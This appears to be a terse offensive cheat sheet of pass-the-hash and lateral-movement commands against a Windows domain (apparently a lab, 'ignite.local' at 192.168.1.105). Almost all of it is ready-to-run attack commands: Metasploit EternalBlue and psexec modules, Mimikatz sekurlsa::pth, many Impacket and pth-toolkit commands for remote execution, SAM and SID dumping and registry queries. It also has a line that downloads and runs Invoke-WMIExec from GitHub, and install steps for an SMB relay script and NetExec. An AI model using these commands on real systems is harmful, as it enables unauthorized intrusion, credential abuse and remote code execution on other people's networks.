MSF

use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/psexec
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38

MiMi

privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38

Impacket

#SMB
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$
crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

#WMI
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 "select Name from Win32_UserAccount"
#win
wget <https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1>; Invoke-WMIExec -Target 192.168.1.105 -Domain ignite -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\\hacked" -Verbose
wmiexec.exe -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]

#RPC
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105
pth-net rpc share list -U 'ignite\\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.105

#Other
pth-winexe -U Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 cmd.exe
pth-curl --ntlm -u Administrator:32196B56FFE6F45E294117B91A83BF38 <http://192.168.1.105/file.txt>
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected] whoami
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python reg.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected] query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s

SMB Relay Attack Script

git clone <https://github.com/m4lal0/smbrelay>
cd smbrelay; chmod +x smbrelay.sh
./smbrelay.sh --install

Untitled

❌ CrackMapExec

✅ NetExec

apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

//Start
- NetExec
- nxc
- nxcdb
- netexec